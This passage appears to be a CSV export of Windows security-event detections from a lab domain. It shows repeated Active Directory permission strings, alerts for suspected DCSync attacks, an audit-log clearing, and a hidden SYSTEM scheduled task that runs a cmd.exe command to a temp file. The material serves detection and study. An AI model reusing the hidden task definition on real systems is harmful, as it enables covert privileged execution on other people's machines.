O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security schedule task created,1553508330.695604,2019-03-19T04:02:04.335561+04:00,,Audit,High,schedule task created by user,4698," 4698 0 0 12804 0 0x8020000000000000 566836 Security WIN-77LTAPHIQ1R.example.corp S-1-5-21-1587066498-1489273250-1035260531-500 Administrator EXAMPLE 0x17e2d2 \CYAlyNSS <?xml version="1.0" encoding="UTF-16"?> <Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> <Triggers> <CalendarTrigger> <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> <Enabled>true</Enabled> <ScheduleByDay> <DaysInterval>1</DaysInterval> </ScheduleByDay> </CalendarTrigger> </Triggers> <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> <LogonType>InteractiveToken</LogonType> </Principal> </Principals> <Settings> <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> <AllowHardTerminate>true</AllowHardTerminate> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>true</Hidden> <RunOnlyIfIdle>false</RunOnlyIfIdle> <WakeToRun>false</WakeToRun> <ExecutionTimeLimit>P3D</ExecutionTimeLimit> <Priority>7</Priority> </Settings> <Actions Context="LocalSystem"> <Exec> <Command>cmd.exe</Command> <Arguments>/C tasklist > %windir%\Temp\CYAlyNSS.tmp 2>&1</Arguments> </Exec> </Actions> </Task> ",WIN-77LTAPHIQ1R.example.corp,Security Audit log cleared,1552953724.335561,2019-03-25T14:05:30.695604+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102," 1102 0 4 104 0 0x4020000000000000 198238040 Security DC1.insecurebank.local S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x8d7099 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242592 Security DC1.insecurebank.local 57DCCD4C-7381-4371-8480-D74D47019AD8 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242591 Security DC1.insecurebank.local A1AA38AA-447E-46C2-ABA0-D205D4D8F873 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14674 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242590 Security DC1.insecurebank.local A1AA38AA-447E-46C2-ABA0-D205D4D8F873 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) %%14675 ",DC1.insecurebank.local,Security Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," 5136 0 0 14081 0 0x8020000000000000 198242589 Security DC1.insecurebank.local 2EA9670C-F0F9-4D3F-90E5-A087E8C05863 - S-1-5-21-738609754-2819869699-4189121830-1108 bob insecurebank 0x40f2719 insecurebank.local %%14676 DC=insecurebank,DC=local C6FAF700-BFE4-452A-A766-424F84C29583 domainDNS nTSecurityDescriptor 2.5.5.15 O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;